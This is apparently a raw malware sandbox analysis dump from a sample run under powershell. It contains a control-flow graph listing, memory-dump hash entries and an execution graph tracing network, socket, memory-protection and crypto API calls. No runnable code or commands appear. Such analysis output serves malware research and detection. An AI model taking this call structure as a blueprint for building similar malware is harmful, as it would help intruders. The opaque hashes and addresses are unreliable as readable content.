                                                                                  control_flow_graph 843 7a51b58-7a51b7a 844 7a51cf7-7a51d42 843->844 845 7a51b80-7a51b85 843->845 851 7a51e9d-7a51ee2 844->851 852 7a51d48-7a51d4d 844->852 846 7a51b87-7a51b8d 845->846 847 7a51b9d-7a51ba9 845->847 848 7a51b91-7a51b9b 846->848 849 7a51b8f 846->849 857 7a51ca2-7a51cac 847->857 858 7a51baf-7a51bb2 847->858 848->847 849->847 870 7a5208c-7a52096 851->870 871 7a51ee8-7a51eed 851->871 855 7a51d65-7a51d69 852->855 856 7a51d4f-7a51d55 852->856 860 7a51d6f-7a51d73 855->860 861 7a51e48-7a51e52 855->861 863 7a51d57 856->863 864 7a51d59-7a51d63 856->864 865 7a51cae-7a51cb7 857->865 866 7a51cba-7a51cc0 857->866 858->857 859 7a51bb8-7a51bbf 858->859 859->844 867 7a51bc5-7a51bca 859->867 868 7a51d75-7a51d86 860->868 869 7a51db3 860->869 872 7a51e54-7a51e5d 861->872 873 7a51e60-7a51e66 861->873 863->855 864->855 874 7a51cc6-7a51cd2 866->874 875 7a51cc2-7a51cc4 866->875 876 7a51be2-7a51be6 867->876 877 7a51bcc-7a51bd2 867->877 868->851 897 7a51d8c-7a51d91 868->897 882 7a51db5-7a51db7 869->882 906 7a5209f-7a520bc 870->906 907 7a52098-7a5209d 870->907 878 7a51f05-7a51f09 871->878 879 7a51eef-7a51ef5 871->879 880 7a51e6c-7a51e78 873->880 881 7a51e68-7a51e6a 873->881 884 7a51cd4-7a51cf4 874->884 875->884 876->857 889 7a51bec-7a51bf0 876->889 886 7a51bd4 877->886 887 7a51bd6-7a51be0 877->887 894 7a52034-7a5203e 878->894 895 7a51f0f-7a51f13 878->895 890 7a51ef7 879->890 891 7a51ef9-7a51f03 879->891 893 7a51e7a-7a51e9a 880->893 881->893 882->861 896 7a51dbd-7a51dc1 882->896 886->876 887->876 904 7a51c10 889->904 905 7a51bf2-7a51c0e 889->905 890->878 891->878 898 7a52040-7a52049 894->898 899 7a5204c-7a52052 894->899 900 7a51f15-7a51f26 895->900 901 7a51f53 895->901 896->861 902 7a51dc7-7a51dd6 896->902 910 7a51d93-7a51d99 897->910 911 7a51da9-7a51db1 897->911 913 7a52054-7a52056 899->913 914 7a52058-7a52064 899->914 900->870 935 7a51f2c-7a51f31 900->935 916 7a51f55-7a51f57 901->916 936 7a51dee-7a51e45 902->936 937 7a51dd8-7a51dde 902->937 917 7a51c12-7a51c14 904->917 905->917 918 7a520f5-7a520ff 906->918 919 7a520be-7a520db 906->919 907->906 923 7a51d9d-7a51da7 910->923 924 7a51d9b 910->924 911->882 927 7a52066-7a52089 913->927 914->927 916->894 929 7a51f5d-7a51f61 916->929 917->857 920 7a51c1a-7a51c1d 917->920 921 7a52101-7a52105 918->921 922 7a52108-7a5210e 918->922 941 7a52145-7a5214a 919->941 942 7a520dd-7a520ef 919->942 940 7a51c27 920->940 933 7a52114-7a52120 922->933 934 7a52110-7a52112 922->934 923->911 924->911 929->894 939 7a51f67-7a51f6b 929->939 943 7a52122-7a52142 933->943 934->943 945 7a51f33-7a51f39 935->945 946 7a51f49-7a51f51 935->946 947 7a51de0 937->947 948 7a51de2-7a51de4 937->948 939->894 951 7a51f71-7a51f97 939->951 956 7a51c2e-7a51c30 940->956 941->942 942->918 954 7a51f3d-7a51f47 945->954 955 7a51f3b 945->955 946->916 947->936 948->936 951->894 969 7a51f9d-7a51fa1 951->969 954->946 955->946 961 7a51c32-7a51c38 956->961 962 7a51c48-7a51c9f 956->962 965 7a51c3c-7a51c3e 961->965 966 7a51c3a 961->966 965->962 966->962 970 7a51fc4 969->970 971 7a51fa3-7a51fac 969->971 974 7a51fc7-7a51fd4 970->974 972 7a51fb3-7a51fc0 971->972 973 7a51fae-7a51fb1 971->973 975 7a51fc2 972->975 973->975 977 7a51fda-7a52031 974->977 975->974
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2388226735.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q
                                                                                  • API String ID: 0-1259897404
                                                                                  • Opcode ID: 557d9f471b80d1123876c791321b181d9615040b7c913150d06fbb24de728ee0
                                                                                  • Instruction ID: 6c0b711b731eff840620743fb1ec0352d45356f55b5f1a041fe6ed2dec1f2f72
                                                                                  • Opcode Fuzzy Hash: 557d9f471b80d1123876c791321b181d9615040b7c913150d06fbb24de728ee0
                                                                                  • Instruction Fuzzy Hash: 8D218EF0A0020ECFCB28DF6AC544B7A77F1BFC5614F158566D8298B250E736D981CB91
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2388226735.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 38bf1c20dd9905fced9132fed0cf2b90ef243a1fc71b2b4b16337a61d4ec7bba
                                                                                  • Instruction ID: 294918a5e340f2d9cff602fdf13b8cc20cdf0500f0e1308869fe210495a50cde
                                                                                  • Opcode Fuzzy Hash: 38bf1c20dd9905fced9132fed0cf2b90ef243a1fc71b2b4b16337a61d4ec7bba
                                                                                  • Instruction Fuzzy Hash: 392149B1314305ABCB285B7A889173F7BDAAFC5B05F64842AE955CB381CD72DC80C360
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2388226735.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 6b0cd20f81af083118734210f0b261340ef40877809ec185fa3c76e51d6afc54
                                                                                  • Instruction ID: 50ce7798237884fbbe549756c7a73287bfb7ca31522dfab656c3b1ecb8f34f28
                                                                                  • Opcode Fuzzy Hash: 6b0cd20f81af083118734210f0b261340ef40877809ec185fa3c76e51d6afc54
                                                                                  • Instruction Fuzzy Hash: 4C2164B1304345BBCB240B7A898077B7BE5AFC2714F288426D955CB286CA759D84C370
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2351808554.000000000329D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0329D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_329d000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 01954ba64890a7d69c3ce12b57cad8f90bb0d25e2bcfb151a48e8943965862d7
                                                                                  • Instruction ID: 5016b9cd747687e80de18998b9d061d90b20586e984ab7fb68af67c5b42974f7
                                                                                  • Opcode Fuzzy Hash: 01954ba64890a7d69c3ce12b57cad8f90bb0d25e2bcfb151a48e8943965862d7
                                                                                  • Instruction Fuzzy Hash: 37012631018344DAFB20CA29CD84B67FF9CEF46324F1CC56BED480B246C2B99881DAB1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2351808554.000000000329D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0329D000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_329d000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 45454c4948070e8313a10812478cb88b704281da9c59f19c13423cbbce451a43
                                                                                  • Instruction ID: 104a6e4d02be31da220b13203822971e3d9828875eaebb4161ea719228b6cb7a
                                                                                  • Opcode Fuzzy Hash: 45454c4948070e8313a10812478cb88b704281da9c59f19c13423cbbce451a43
                                                                                  • Instruction Fuzzy Hash: 5C01447100D3C09FE7128B258C94752BFB4DF47224F1D84DBD9888F193C2695844D772
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2352205514.0000000004E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E90000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_4e90000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Xaq$$]q
                                                                                  • API String ID: 0-1280934391
                                                                                  • Opcode ID: 99915ccd6f1f79f1f8a27480d708a217af49934ab2df6c18d019039761e0d4ea
                                                                                  • Instruction ID: 6ccbd64692deaf6c9d8e41fdf013f8381ea7dad411e683186b8d622bd1c13189
                                                                                  • Opcode Fuzzy Hash: 99915ccd6f1f79f1f8a27480d708a217af49934ab2df6c18d019039761e0d4ea
                                                                                  • Instruction Fuzzy Hash: 24918D74B002189BDF48AF7998646BE7BA7BFC8711B04C52DD40AE7389DE34DC069792
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2388226735.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                  • API String ID: 0-3118171705
                                                                                  • Opcode ID: a027e77beb8c681f0deb114bd213ce41a6da8d8cc53b6b4bb0c974f0aa7435e4
                                                                                  • Instruction ID: a6475b90206b1f054d334f667f5a545826b41a469eab7670030501b8a1631b9e
                                                                                  • Opcode Fuzzy Hash: a027e77beb8c681f0deb114bd213ce41a6da8d8cc53b6b4bb0c974f0aa7435e4
                                                                                  • Instruction Fuzzy Hash: F1A135B2B0434A9FCB248B69C85077ABBF5AFC5610F2484BBDD65CB241DA35C845C7A1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2388226735.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $]q$$]q$$]q$$]q
                                                                                  • API String ID: 0-858218434
                                                                                  • Opcode ID: a3a7236de35216eb84ce8b4bfb62284c72a4544fa411ed6718e7208b1f9743f5
                                                                                  • Instruction ID: 2e6b724cca08a49e9fef46f697027bbb40c15225fed139b0f7eaf5b6bb52e230
                                                                                  • Opcode Fuzzy Hash: a3a7236de35216eb84ce8b4bfb62284c72a4544fa411ed6718e7208b1f9743f5
                                                                                  • Instruction Fuzzy Hash: 1F219DF5A1030EEBDF248F59C98077AB7F5BBC5A51F1441AADD7887201EB368440CB91
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000009.00000002.2388226735.0000000007A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A50000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_9_2_7a50000_powershell.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4']q$4']q$$]q$$]q
                                                                                  • API String ID: 0-978391646
                                                                                  • Opcode ID: 939995a68191eb94f0ec32b8ec90a44e228dd58835e67a75c23a1eab2cb9fe9a
                                                                                  • Instruction ID: 2c5515fa9d5c0f1468b87f4f99b347fb1be39fec005155756cdf5943e2fe673a
                                                                                  • Opcode Fuzzy Hash: 939995a68191eb94f0ec32b8ec90a44e228dd58835e67a75c23a1eab2cb9fe9a
                                                                                  • Instruction Fuzzy Hash: 870126713083861FC72A023C18700272FB96FC3A2072A46E7C9E0DF297CA754C4683A3

                                                                                  Execution Graph

                                                                                  Execution Coverage:5%
                                                                                  Dynamic/Decrypted Code Coverage:3.8%
                                                                                  Signature Coverage:5.4%
                                                                                  Total number of Nodes:1889
                                                                                  Total number of Limit Nodes:72
                                                                                  execution_graph 53075 415d41 53090 41b411 53075->53090 53077 415d4a 53101 4020f6 53077->53101 53082 4170c4 53125 401e8d 53082->53125 53086 401fd8 11 API calls 53087 4170d9 53086->53087 53088 401fd8 11 API calls 53087->53088 53089 4170e5 53088->53089 53131 4020df 53090->53131 53095 41b456 InternetReadFile 53096 41b479 53095->53096 53096->53095 53097 41b4a6 InternetCloseHandle InternetCloseHandle 53096->53097 53100 401fd8 11 API calls 53096->53100 53142 4020b7 53096->53142 53099 41b4b8 53097->53099 53099->53077 53100->53096 53102 40210c 53101->53102 53103 4023ce 11 API calls 53102->53103 53104 402126 53103->53104 53105 402569 28 API calls 53104->53105 53106 402134 53105->53106 53107 404aa1 53106->53107 53108 404ab4 53107->53108 53209 40520c 53108->53209 53110 404ac9 ctype 53111 404b40 WaitForSingleObject 53110->53111 53112 404b20 53110->53112 53114 404b56 53111->53114 53113 404b32 send 53112->53113 53115 404b7b 53113->53115 53215 4210cb 54 API calls 53114->53215 53118 401fd8 11 API calls 53115->53118 53117 404b69 SetEvent 53117->53115 53119 404b83 53118->53119 53120 401fd8 11 API calls 53119->53120 53121 404b8b 53120->53121 53121->53082 53122 401fd8 53121->53122 53123 4023ce 11 API calls 53122->53123 53124 401fe1 53123->53124 53124->53082 53126 402163 53125->53126 53127 40219f 53126->53127 53233 402730 11 API calls 53126->53233 53127->53086 53129 402184 53234 402712 11 API calls std::_Deallocate 53129->53234 53132 4020e7 53131->53132 53148 4023ce 53132->53148 53134 4020f2 53135 43bda0 53134->53135 53140 4461b8 __Getctype 53135->53140 53136 4461f6 53164 44062d 20 API calls __dosmaperr 53136->53164 53137 4461e1 RtlAllocateHeap 53139 41b42f InternetOpenW InternetOpenUrlW 53137->53139 53137->53140 53139->53095 53140->53136 53140->53137 53163 443001 7 API calls 2 library calls 53140->53163 53143 4020bf 53142->53143 53144 4023ce 11 API calls 53143->53144 53145 4020ca 53144->53145 53165 40250a 53145->53165 53147 4020d9 53147->53096 53149 402428 53148->53149 53150 4023d8 53148->53150 53149->53134 53150->53149 53152 4027a7 53150->53152 53153 402e21 53152->53153 53156 4016b4 53153->53156 53155 402e30 53155->53149 53157 4016c6 53156->53157 53158 4016cb 53156->53158 53162 43bd68 11 API calls _Atexit 53157->53162 53158->53157 53160 4016f3 53158->53160 53160->53155 53161 43bd67 53162->53161 53163->53140 53164->53139 53166 40251a 53165->53166 53167 402520 53166->53167 53168 402535 53166->53168 53172 402569 53167->53172 53182 4028e8 53168->53182 53171 402533 53171->53147 53193 402888 53172->53193 53174 40257d 53175 402592 53174->53175 53176 4025a7 53174->53176 53198 402a34 22 API calls 53175->53198 53178 4028e8 28 API calls 53176->53178 53181 4025a5 53178->53181 53179 40259b 53199 4029da 22 API calls 53179->53199 53181->53171 53183 4028f1 53182->53183 53184 402953 53183->53184 53185 4028fb 53183->53185 53207 4028a4 22 API calls 53184->53207 53188 402904 53185->53188 53191 402917 53185->53191 53201 402cae 53188->53201 53189 402915 53189->53171 53191->53189 53192 4023ce 11 API calls 53191->53192 53192->53189 53194 402890 53193->53194 53195 402898 53194->53195 53200 402ca3 22 API calls 53194->53200 53195->53174 53198->53179 53199->53181 53202 402cb8 __EH_prolog 53201->53202 53208 402e54 22 API calls 53202->53208 53204 4023ce 11 API calls 53206 402d92 53204->53206 53205 402d24 53205->53204 53206->53189 53208->53205 53210 405214 53209->53210 53211 4023ce 11 API calls 53210->53211 53212 40521f 53211->53212 53216 405234 53212->53216 53214 40522e 53214->53110 53215->53117 53217 405240 53216->53217 53218 40526e 53216->53218 53220 4028e8 28 API calls 53217->53220 53232 4028a4 22 API calls 53218->53232 53222 40524a 53220->53222 53222->53214 53233->53129 53234->53127 53235 1000c7a7 53236 1000c7be 53235->53236 53245 1000c82c 53235->53245 53236->53245 53247 1000c7e6 GetModuleHandleA 53236->53247 53237 1000c872 53238 1000c835 GetModuleHandleA 53241 1000c83f 53238->53241 53240 1000c7dd 53240->53241 53243 1000c800 GetProcAddress 53240->53243 53240->53245 53242 1000c85f GetProcAddress 53241->53242 53241->53245 53242->53245 53244 1000c80d VirtualProtect 53243->53244 53243->53245 53244->53245 53246 1000c81c VirtualProtect 53244->53246 53245->53237 53245->53238 53245->53241 53246->53245 53248 1000c7ef 53247->53248 53255 1000c82c 53247->53255 53259 1000c803 GetProcAddress 53248->53259 53250 1000c835 GetModuleHandleA 53257 1000c83f 53250->53257 53251 1000c7f4 53253 1000c800 GetProcAddress 53251->53253 53251->53255 53252 1000c872 53254 1000c80d VirtualProtect 53253->53254 53253->53255 53254->53255 53256 1000c81c VirtualProtect 53254->53256 53255->53250 53255->53252 53255->53257 53256->53255 53257->53255 53258 1000c85f GetProcAddress 53257->53258 53258->53255 53260 1000c82c 53259->53260 53261 1000c80d VirtualProtect 53259->53261 53263 1000c872 53260->53263 53264 1000c835 GetModuleHandleA 53260->53264 53261->53260 53262 1000c81c VirtualProtect 53261->53262 53262->53260 53265 1000c83f 53264->53265 53265->53260 53266 1000c85f GetProcAddress 53265->53266 53266->53265 53267 43bea8 53270 43beb4 _swprintf ___FrameUnwindToState 53267->53270 53268 43bec2 53283 44062d 20 API calls __dosmaperr 53268->53283 53270->53268 53271 43beec 53270->53271 53278 445909 EnterCriticalSection 53271->53278 53273 43bec7 _strftime ___FrameUnwindToState 53274 43bef7 53279 43bf98 53274->53279 53278->53274 53280 43bfa6 53279->53280 53282 43bf02 53280->53282 53285 4497ec 37 API calls 2 library calls 53280->53285 53284 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 53282->53284 53283->53273 53284->53273 53285->53280 53286 41e04e 53287 41e063 ctype ___scrt_fastfail 53286->53287 53288 41e266 53287->53288 53289 432f55 21 API calls 53287->53289 53294 41e21a 53288->53294 53300 41dbf3 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 53288->53300 53293 41e213 ___scrt_fastfail 53289->53293 53291 41e277 53291->53294 53301 432f55 53291->53301 53293->53294 53295 432f55 21 API calls 53293->53295 53298 41e240 ___scrt_fastfail 53295->53298 53296 41e2b0 ___scrt_fastfail 53296->53294 53306 4335db 53296->53306 53298->53294 53299 432f55 21 API calls 53298->53299 53299->53288 53300->53291 53302 432f63 53301->53302 53303 432f5f 53301->53303 53304 43bda0 new 21 API calls 53302->53304 53303->53296 53305 432f68 53304->53305 53305->53296 53309 4334fa 53306->53309 53308 4335e3 53308->53294 53310 433513 53309->53310 53313 433509 53309->53313 53311 432f55 21 API calls 53310->53311 53310->53313 53312 433534 53311->53312 53312->53313 53315 4338c8 CryptAcquireContextA 53312->53315 53313->53308 53316 4338e4 53315->53316 53317 4338e9 CryptGenRandom 53315->53317 53316->53313 53317->53316 53318 4338fe CryptReleaseContext 53317->53318 53318->53316 53319 426c6d 53325 426d42 recv 53319->53325 53326 429ab3 53331 429a36 53326->53331 53328 429afd 53329 429ac7 _memcmp 53329->53328 53339 429025 21 API calls ctype 53329->53339 53332 429aa7 53331->53332 53333 429a41 53331->53333 53332->53329 53333->53332 53340 429182 21 API calls ctype 53333->53340 53335 429a82 53335->53332 53341 4299c7 53335->53341 53339->53328 53340->53335 53342 4299ee 53341->53342 53343 4299f4 53342->53343 53348 429903 53342->53348 53347 429182 21 API calls ctype 53343->53347 53346 429903 22 API calls 53346->53343 53347->53332 53350 429928 ctype ___scrt_fastfail 53348->53350 53349 4299ac 53349->53346 53350->53349 53352 429799 53350->53352 53357 41b34b 53352->53357 53355 4297b6 53356 4297d3 53355->53356 53360 4282e5 53355->53360 53356->53349 53363 43ab1a 53357->53363 53374 442a80 53360->53374 53366 43aa9b 53363->53366 53365 41b352 53365->53355 53367 43aaaa 53366->53367 53368 43aabe 53366->53368 53372 44062d 20 API calls __dosmaperr 53367->53372 53371 43aaaf __alldvrm _strftime 53368->53371 53373 4489d7 11 API calls 2 library calls 53368->53373 53371->53365 53372->53371 53373->53371 53379 442a42 21 API calls 3 library calls 53374->53379 53376 442a8b 53377 4282eb 53376->53377 53380 442851 20 API calls 3 library calls 53376->53380 53377->53356 53379->53376 53380->53377 53381 426a77 53382 426a8c 53381->53382 53389 426b1e 53381->53389 53383 426b83 53382->53383 53384 426b0e 53382->53384 53385 426bae 53382->53385 53382->53389 53391 426b4e 53382->53391 53393 426ad9 53382->53393 53395 426bd5 53382->53395 53409 424f6e 49 API calls ctype 53382->53409 53383->53385 53413 425781 21 API calls 53383->53413 53384->53389 53384->53391 53411 424f6e 49 API calls ctype 53384->53411 53385->53389 53385->53395 53397 425b72 53385->53397 53391->53383 53391->53389 53412 41fbfd 52 API calls 53391->53412 53393->53384 53393->53389 53410 41fbfd 52 API calls 53393->53410 53395->53389 53414 4261e6 28 API calls 53395->53414 53398 425b91 ___scrt_fastfail 53397->53398 53400 425ba0 53398->53400 53404 425bc5 53398->53404 53415 41ec4c 21 API calls 53398->53415 53400->53404 53408 425ba5 53400->53408 53416 420669 46 API calls 53400->53416 53403 425bae 53403->53404 53418 424d96 21 API calls 2 library calls 53403->53418 53404->53395 53406 425c48 53406->53404 53407 432f55 21 API calls 53406->53407 53407->53408 53408->53403 53408->53404 53417 41daf0 49 API calls 53408->53417 53409->53393 53410->53393 53411->53391 53412->53391 53413->53385 53414->53389 53415->53400 53416->53406 53417->53403 53418->53404 53419 4165db 53430 401e65 53419->53430 53421 4165eb 53422 4020f6 28 API calls 53421->53422 53423 4165f6 53422->53423 53424 401e65 22 API calls 53423->53424 53425 416601 53424->53425 53426 4020f6 28 API calls 53425->53426 53427 41660c 53426->53427 53435 412965 53427->53435 53431 401e6d 53430->53431 53434 401e75 53431->53434 53454 402158 22 API calls 53431->53454 53434->53421 53455 40482d 53435->53455 53437 412979 53462 4048c8 connect 53437->53462 53441 41299a 53527 402f10 53441->53527 53444 404aa1 61 API calls 53445 4129ae 53444->53445 53446 401fd8 11 API calls 53445->53446 53447 4129b6 53446->53447 53532 404c10 53447->53532 53450 401fd8 11 API calls 53451 4129cc 53450->53451 53452 401fd8 11 API calls 53451->53452 53453 4129d4 53452->53453 53456 404846 socket 53455->53456 53457 404839 53455->53457 53459 404860 CreateEventW 53456->53459 53460 404842 53456->53460 53550 40489e WSAStartup 53457->53550 53459->53437 53460->53437 53461 40483e 53461->53456 53461->53460 53463 404a1b 53462->53463 53464 4048ee 53462->53464 53465 40497e 53463->53465 53466 404a21 WSAGetLastError 53463->53466 53464->53465 53467 404923 53464->53467 53551 40531e 53464->53551 53522 402f31 53465->53522 53466->53465 53468 404a31 53466->53468 53586 420cf1 27 API calls 53467->53586 53470 404932 53468->53470 53471 404a36 53468->53471 53476 402093 28 API calls 53470->53476 53597 41cb72 30 API calls 53471->53597 53473 40490f 53556 402093 53473->53556 53475 40492b 53475->53470 53479 404941 53475->53479 53480 404a80 53476->53480 53478 404a40 53598 4052fd 28 API calls 53478->53598 53488 404950 53479->53488 53489 404987 53479->53489 53483 402093 28 API calls 53480->53483 53486 404a8f 53483->53486 53491 41b580 80 API calls 53486->53491 53490 402093 28 API calls 53488->53490 53594 421ad1 54 API calls 53489->53594 53494 40495f 53490->53494 53491->53465 53497 402093 28 API calls 53494->53497 53496 40498f 53499 4049c4 53496->53499 53500 404994 53496->53500 53501 40496e 53497->53501 53596 420e97 28 API calls 53499->53596 53504 402093 28 API calls 53500->53504 53505 41b580 80 API calls 53501->53505 53507 4049a3 53504->53507 53508 404973 53505->53508 53506 4049cc 53509 4049f9 CreateEventW CreateEventW 53506->53509 53512 402093 28 API calls 53506->53512 53510 402093 28 API calls 53507->53510 53587 420d31 53508->53587 53509->53465 53511 4049b2 53510->53511 53513 41b580 80 API calls 53511->53513 53515 4049e2 53512->53515 53516 4049b7 53513->53516 53517 402093 28 API calls 53515->53517 53595 421143 52 API calls 53516->53595 53519 4049f1 53517->53519 53520 41b580 80 API calls 53519->53520 53521 4049f6 53520->53521 53521->53509 53523 4020df 11 API calls 53522->53523 53524 402f3d 53523->53524 53525 4032a0 28 API calls 53524->53525 53526 402f59 53525->53526 53526->53441 53651 401fb0 53527->53651 53529 402f1e 53530 402055 11 API calls 53529->53530 53531 402f2d 53530->53531 53531->53444 53533 4020df 11 API calls 53532->53533 53534 404c27 53533->53534 53535 4020df 11 API calls 53534->53535 53538 404c30 53535->53538 53536 43bda0 new 21 API calls 53536->53538 53538->53536 53539 4020b7 28 API calls 53538->53539 53541 404ca1 53538->53541 53543 401fd8 11 API calls 53538->53543 53654 404b96 53538->53654 53660 401fe2 53538->53660 53669 404cc3 53538->53669 53539->53538 53681 404e26 WaitForSingleObject 53541->53681 53543->53538 53545 401fd8 11 API calls 53546 404cb1 53545->53546 53547 401fd8 11 API calls 53546->53547 53548 404cba 53547->53548 53548->53450 53550->53461 53552 4020df 11 API calls 53551->53552 53553 40532a 53552->53553 53599 4032a0 53553->53599 53555 405346 53555->53473 53557 40209b 53556->53557 53558 4023ce 11 API calls 53557->53558 53559 4020a6 53558->53559 53603 4024ed 53559->53603 53562 41b580 53563 41b631 53562->53563 53564 41b596 GetLocalTime 53562->53564 53566 401fd8 11 API calls 53563->53566 53565 40531e 28 API calls 53564->53565 53567 41b5d8 53565->53567 53568 41b639 53566->53568 53607 406383 53567->53607 53570 401fd8 11 API calls 53568->53570 53572 41b641 53570->53572 53572->53467 53573 402f10 28 API calls 53574 41b5f0 53573->53574 53575 406383 28 API calls 53574->53575 53576 41b5fc 53575->53576 53612 40723b 77 API calls 53576->53612 53578 41b60a 53579 401fd8 11 API calls 53578->53579 53580 41b616 53579->53580 53581 401fd8 11 API calls 53580->53581 53582 41b61f 53581->53582 53583 401fd8 11 API calls 53582->53583 53584 41b628 53583->53584 53585 401fd8 11 API calls 53584->53585 53585->53563 53586->53475 53588 41e7a2 53587->53588 53589 420d39 53587->53589 53590 41e7b0 53588->53590 53649 41d8ec DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53588->53649 53589->53465 53650 41e4d2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53590->53650 53593 41e7b7 53594->53496 53595->53508 53596->53506 53597->53478 53601 4032aa 53599->53601 53600 4032c9 53600->53555 53601->53600 53602 4028e8 28 API calls 53601->53602 53602->53600 53604 4024f9 53603->53604 53605 40250a 28 API calls 53604->53605 53606 4020b1 53605->53606 53606->53562 53613 4051ef 53607->53613 53609 406391 53617 402055 53609->53617 53612->53578 53614 4051fb 53613->53614 53623 405274 53614->53623 53616 405208 53616->53609 53618 402061 53617->53618 53619 4023ce 11 API calls 53618->53619 53620 40207b 53619->53620 53645 40267a 53620->53645 53624 405282 53623->53624 53625 405288 53624->53625 53626 40529e 53624->53626 53634 4025f0 53625->53634 53628 4052f5 53626->53628 53630 4052b6 53626->53630 53643 4028a4 22 API calls 53628->53643 53632 4028e8 28 API calls 53630->53632 53633 40529c 53630->53633 53632->53633 53633->53616 53635 402888 22 API calls 53634->53635 53636 402602 53635->53636 53637 402672 53636->53637 53638 402629 53636->53638 53644 4028a4 22 API calls 53637->53644 53640 4028e8 28 API calls 53638->53640 53642 40263b 53638->53642 53640->53642 53642->53633 53646 40268b 53645->53646 53647 4023ce 11 API calls 53646->53647 53648 40208d 53647->53648 53648->53573 53649->53590 53650->53593 53652 4025f0 28 API calls 53651->53652 53653 401fbd 53652->53653 53653->53529 53655 404ba0 WaitForSingleObject 53654->53655 53656 404bcd recv 53654->53656 53695 421107 54 API calls 53655->53695 53658 404be0 53656->53658 53658->53538 53659 404bbc SetEvent 53659->53658 53661 401ff1 53660->53661 53662 402039 53660->53662 53663 4023ce 11 API calls 53661->53663 53662->53538 53664 401ffa 53663->53664 53665 40203c 53664->53665 53666 402015 53664->53666 53667 40267a 11 API calls 53665->53667 53696 403098 28 API calls 53666->53696 53667->53662 53670 4020df 11 API calls 53669->53670 53680 404cde 53670->53680 53671 404e13 53672 401fd8 11 API calls 53671->53672 53673 404e1c 53672->53673 53673->53538 53674 4041a2 28 API calls 53674->53680 53675 401fe2 28 API calls 53675->53680 53676 401fd8 11 API calls 53676->53680 53678 4020f6 28 API calls 53678->53680 53680->53671 53680->53674 53680->53675 53680->53676 53680->53678 53697 401fc0 53680->53697 53682 404e40 SetEvent CloseHandle 53681->53682 53683 404e57 closesocket 53681->53683 53684 404ca8 53682->53684 53685 404e64 53683->53685 53684->53545 53686 404e73 53685->53686 53687 404e7a 53685->53687 53970 4050e4 84 API calls 53686->53970 53688 404e8c WaitForSingleObject 53687->53688 53689 404ece SetEvent CloseHandle 53687->53689 53691 420d31 3 API calls 53688->53691 53689->53684 53692 404e9b SetEvent WaitForSingleObject 53691->53692 53693 420d31 3 API calls 53692->53693 53694 404eb3 SetEvent CloseHandle CloseHandle 53693->53694 53694->53689 53695->53659 53696->53662 53698 401fd2 CreateEventA CreateThread WaitForSingleObject CloseHandle 53697->53698 53699 401fc9 53697->53699 53698->53680 53702 415b25 53698->53702 53701 4025e0 28 API calls 53699->53701 53701->53698 53703 4020f6 28 API calls 53702->53703 53704 415b47 SetEvent 53703->53704 53705 415b5c 53704->53705 53781 4041a2 53705->53781 53708 4020f6 28 API calls 53709 415b86 53708->53709 53710 4020f6 28 API calls 53709->53710 53711 415b98 53710->53711 53784 41beac 53711->53784 53714 415bc1 GetTickCount 53806 41bc1f 53714->53806 53715 415d20 53778 415d34 53715->53778 53780 415d11 53715->53780 53716 401e8d 11 API calls 53718 4170cd 53716->53718 53721 401fd8 11 API calls 53718->53721 53723 4170d9 53721->53723 53725 401fd8 11 API calls 53723->53725 53724 415bde 